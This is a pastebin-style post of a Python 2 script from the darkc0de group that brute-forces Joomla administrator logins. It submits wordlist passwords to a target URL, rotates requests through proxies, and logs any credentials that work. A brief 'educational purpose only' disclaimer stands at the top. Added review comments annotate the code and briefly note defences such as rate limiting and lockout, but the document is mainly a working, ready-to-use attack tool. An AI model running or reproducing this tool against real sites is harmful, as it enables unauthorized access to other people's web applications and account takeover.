Jemb0t_IR3eng

Joomla Administrator Panel BruteForcer

Mar 10th, 2017
  1. ###########################
  2.  
  3. # Joomla Administrator Panel BruteForcer
  4.  
  5. ###########################
  6.  
  7. #!/usr/bin/python
  8. # Joomla Administrator Login BruteForcer for v1.0 and v1.5
  9.  
  10. # Feel free to do whatever you want with this code!
  11. # Share the c0de!
  12.  
  13. # Darkc0de Team
  14. # www.darkc0de.com
  15. # rsauron[at]gmail[dot]com
  16.  
  17. # Greetz to
  18. # d3hydr8, P47r1ck, Tarsian, c0mrade, reverenddigitalx
  19. # and everyone at darkc0de
  20.  
  21. # This was written for educational purpose only. Use it at your own risk.
  22. # Author will be not responsible for any damage!
  23. # Intended for authorized Web Application Pen Testing!
  24.  
  25. # BE WARNED, THIS TOOL IS VERY LOUD..
  26.  
  27. import urllib, sys, re, os, socket, httplib, urllib2, time
  28.  
  # Choose the shell command used to clear the terminal, keyed on sys.platform.
  # NOTE(review): the paste lost its indentation, so the nesting is shown flat;
  # each SysCls assignment presumably belongs to the branch directly above it.
  29. #determine platform
  30. if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
  31. SysCls = 'clear'
  32. elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
  33. SysCls = 'cls'
  # Any other platform leaves the literal string 'unknown' in SysCls; the
  # script still passes that string to os.system() further down.
  34. else:
  35. SysCls = 'unknown'
  36.  
  # Clear the terminal via the shell, then, when the script is started with no
  # arguments, print the banner and exit with status 1.
  # The print statements are Python 2 syntax, matching the urllib2/httplib imports.
  37. #say hello
  38. os.system(SysCls)
  39. if len(sys.argv) <= 1:
  40. print "\n|----------------------------------------------|"
  41. print "| rsauron[@]gmail[dot]com v1.0 |"
  42. print "| 7/2008 joomlabrute.py |"
  43. print "| - Joomla Administrator Panel BruteForcer |"
  44. print "| Usage: joomlabrute.py [options] |"
  45. print "| -h help darkc0de.com |"
  46. print "|----------------------------------------------|\n"
  47. sys.exit(1)
  48.  
  # Defaults for every command-line option, plus two counters.
  # proxy and arg_verbose use the string "None" (not the None object) as their
  # "not set" marker; later code compares against that string.
  49. #define varablies
  50. site = ""
  51. dbt = "joomlabrutelog.txt"
  52. proxy = "None"
  53. arg_words = ""
  54. arg_user = "admin"
  55. arg_verbose = "None"
  # count: index of the argv entry being examined while options are parsed.
  56. count = 0
  # gets: number of login requests attempted, reported at the end of the run.
  57. gets = 0
  58.  
  # Scan argv for "-h"; when present, print the option summary and exit with
  # status 1 before any other option is processed.
  # The two examples at the end name blindext.py although the usage line names
  # joomlabrute.py.
  59. #help option
  60. for arg in sys.argv:
  61. if arg == "-h":
  62. print "\n Usage: ./joomlabrute.py [options] rsauron[@]gmail[dot]com darkc0de.com"
  63. print "\n\tRequired:"
  64. print "\tDefine: -u www.site.com/administrator/"
  65. print "\tDefine: -w words.txt"
  66. print "\n\tOptional:"
  67. print "\tDefine: -user \"jorge\" Default:admin"
  68. print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\""
  69. print "\tDefine: -o \"ouput_file_name.txt\" Default:joomlabrutelog.txt"
  70. print "\tDefine: -v Verbose Mode"
  71. print "\n Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -v -o site.txt"
  72. print " Ex: ./blindext.py -u \"www.site.com/administrator/\" -w words.txt -user jorge -p 127.0.0.1:8080\n"
  73. sys.exit(1)
  74.  
  # Hand-rolled option parsing: walk argv and, for each recognised flag, take
  # the following argv entry as its value. count mirrors the loop position.
  # There is no bounds check on count+1, so a value-taking flag given as the
  # last argument raises IndexError.
  75. #Check args
  76. for arg in sys.argv:
  77. if arg == "-u":
  78. site = sys.argv[count+1]
  79. elif arg == "-o":
  80. dbt = sys.argv[count+1]
  81. elif arg == "-p":
  82. proxy = sys.argv[count+1]
  83. elif arg == "-w":
  84. arg_words = sys.argv[count+1]
  85. elif arg == "-user":
  86. arg_user = sys.argv[count+1]
  # -v stores the whole argv list; later code only tests that the value is no
  # longer the string "None".
  87. elif arg == "-v":
  88. arg_verbose = sys.argv
  # NOTE(review): presumably at loop-body level (once per argv entry), not
  # inside the -v branch; the paste's lost indentation hides the nesting.
  89. count+=1
  90.  
  # Open the log file in append mode and write the banner to both the console
  # and the log. This runs before the -u / -w checks, so the log file is created
  # or extended even when the run aborts on a missing argument.
  # The name "file" shadows the Python 2 builtin of the same name.
  91. #Title write
  92. file = open(dbt, "a")
  93. print "\n|----------------------------------------------|"
  94. print "| rsauron[@]gmail[dot]com v1.0 |"
  95. print "| 7/2008 joomlabrute.py |"
  96. print "| - Joomla Administrator Panel BruteForcer |"
  97. print "| Usage: joomlabrute.py [options] |"
  98. print "| -h help darkc0de.com |"
  99. print "|----------------------------------------------|"
  100. file.write("\n\n|----------------------------------------------|")
  101. file.write("\n| rsauron[@]gmail[dot]com v1.0 |")
  102. file.write("\n| 7/2008 joomlabrute.py |")
  103. file.write("\n| - Joomla Administrator Panel BruteForcer |")
  104. file.write("\n| Usage: joomlabrute.py [options] |")
  105. file.write("\n| -h help darkc0de.com |")
  106. file.write("\n|----------------------------------------------|\n")
  107.  
  # Validate the required options and normalise the proxy and site values.
  # Exits with status 1 when -u or -w is missing.
  108. #Arg Error Checking
  109. if site == "":
  110. print "[-] Must include -u flag."
  111. print "[-] For help -h\n"
  112. sys.exit(1)
  113. if arg_words == "":
  114. print "[-] Must include -w flag."
  115. print "[-] For help -h\n"
  116. sys.exit(1)
  117. if proxy != "None":
  # A value containing exactly one "." is treated as a file name (the help
  # text's "proxy.txt" form) and replaced by the file's contents; anything
  # else is kept as a literal host:port string.
  118. if len(proxy.split(".")) == 2:
  119. proxy = open(proxy, "r").read()
  120. if proxy.endswith("\n"):
  121. proxy = proxy.rstrip("\n")
  # NOTE(review): presumably runs for both forms, so that proxy is a list of
  # entries for the later "for p in proxy" loop; nesting is not recoverable
  # from the flattened paste.
  122. proxy = proxy.split("\n")
  # Only an exact "http://" prefix is recognised; every other value has
  # "http://" prepended.
  123. if site[:7] != "http://":
  124. site = "http://"+site
  125.  
  # Build the list of urllib2 openers that requests are later sent through:
  # one per working proxy, or a single direct opener when -p was not given.
  # A 10-second default timeout is applied to all sockets first.
  126. #Build proxy list
  127. socket.setdefaulttimeout(10)
  128. proxy_list = []
  129. if proxy != "None":
  130.  
  131. file.write("[+] Building Proxy List...")
  132. print "[+] Building Proxy List..."
  133. for p in proxy:
  134. try:
  135. proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
  136. opener = urllib2.build_opener(proxy_handler)
  # Each proxy is checked by fetching http://www.google.com through it. The
  # User-agent override is installed only after this check request.
  137. opener.open("http://www.google.com")
  138. opener.addheaders = [('User-agent', 'Mozilla/5.0')]
  139. proxy_list.append(opener)
  140. file.write("\n\tProxy:"+p+"- Success")
  141. print "\tProxy:",p,"- Success"
  # Bare except: every exception, including KeyboardInterrupt, is recorded as
  # a failed proxy and the loop continues.
  142. except:
  143. file.write("\n\tProxy:"+p+"- Failed")
  144. print "\tProxy:",p,"- Failed"
  145. pass
  146. if len(proxy_list) == 0:
  147. print "[-] All proxies have failed. App Exiting"
  148. file.write("\n[-] All proxies have failed. App Exiting\n")
  149. sys.exit(1)
  150. print "[+] Proxy List Complete"
  151. file.write("[+] Proxy List Complete")
  152. else:
  153. print "[-] Proxy Not Given"
  154. file.write("[+] Proxy Not Given")
  # The direct opener gets no addheaders override, so its requests carry
  # urllib2's default User-agent (Python-urllib/<version>), unlike the
  # proxied openers, which send Mozilla/5.0. That default is a simple
  # signature to look for in web-server logs.
  155. proxy_list.append(urllib2.build_opener())
  # proxy_num / proxy_len drive the round-robin choice of opener per request.
  156. proxy_num = 0
  157. proxy_len = len(proxy_list)
  158.  
  # Main loop: load the word list, then for each word submit one login form to
  # the target URL and classify the response. Progress goes to stdout and to
  # the log file.
  # Defender view: as written this is a run of back-to-back POSTs to a single
  # URL with a constant usrname and a changing pass; the loop contains no delay
  # and the openers are built without cookie handling. Failed-login rate
  # limiting, account lockout and restricting who can reach the administrator
  # path are the controls that address this pattern.
  159. #here we go
  160. print "[+] BruteForcing:",site
  161. print "[+] Username:",arg_user
  162. file.write("\n[+] BruteForcing:"+str(site))
  163. file.write("\n[+] Username:"+str(arg_user))
  164. try:
  165. words = open(arg_words, "r").readlines()
  166. print "[+] Words Loaded:",len(words)
  167. words_len = len(words)
  168. file.write("\n[+] Words Loaded: "+str(words_len))
  169. except(IOError):
  170. print "[-] Error: Check your wordlist path\n"
  171. sys.exit(1)
  172. print "[+] [%s]" % time.strftime("%X")
  173. file.write("\n[+] [%s]" % time.strftime("%X"))
  174. for word in words:
  175. word = word.replace("\r","").replace("\n","")
  # Form fields sent with every attempt; passing a data argument to
  # opener.open() makes urllib2 issue a POST.
  176. login_form_seq = [
  177. ('usrname', arg_user),
  178. ('pass', word),
  179. ('submit', 'Login')]
  180. login_form_data = urllib.urlencode(login_form_seq)
  # Retry loop: both counters advance on every attempt, successful or not, so
  # the reported request total counts attempts. Any exception other than
  # KeyboardInterrupt/SystemExit is swallowed and the same word is retried
  # immediately, with no retry limit.
  181. while 1:
  182. try:
  183. gets+=1
  184. proxy_num+=1
  185. site_get = proxy_list[proxy_num % proxy_len].open(site, login_form_data).read()
  186. break
  187. except (KeyboardInterrupt, SystemExit):
  188. raise
  189. except:
  190. pass
  191. #See where it says Username... change this to whatever your getting back on a incorrect login
  # A response body without the text "Username" is reported as a successful
  # login, so any page lacking that word (for example an error or block page)
  # is reported the same way. The candidate password is written in clear text
  # to stdout and to the log file.
  192. if re.search("Username",site_get) == None:
  193. print "\n\t[!] Login Successfull:",arg_user+":"+word
  194. file.write("\n\n\t[!] Login Successfull: "+str(arg_user)+":"+str(word))
  195. break
  196. else:
  # NOTE(review): the log write below is presumably unconditional while the
  # print is gated on -v; the flattened paste does not show the nesting.
  197. if arg_verbose != "None":
  198. print "[-] Login Failed:",word
  199. file.write("\n[-] Login Failed:"+str(word))
  200.  
  # Final summary: print and log the end time and the number of requests
  # attempted, point the user at the log file, and close it.
  # This is the only place the log file is closed; the earlier sys.exit(1)
  # paths leave it to interpreter shutdown.
  201. #Lets wrap it up!
  202. print "\n[-] [%s]" % time.strftime("%X")
  203. print "[-] Total URL Requests",gets
  204. file.write("\n\n[-] [%s]" % time.strftime("%X"))
  205. file.write("\n[-] Total URL Requests "+str(gets))
  206. print "[-] Done\n"
  207. file.write("\n[-] Done\n")
  208. print "Don't forget to check", dbt,"\n"
  209. file.close()
  210.  
  211.  
  212.  
  213. ###########################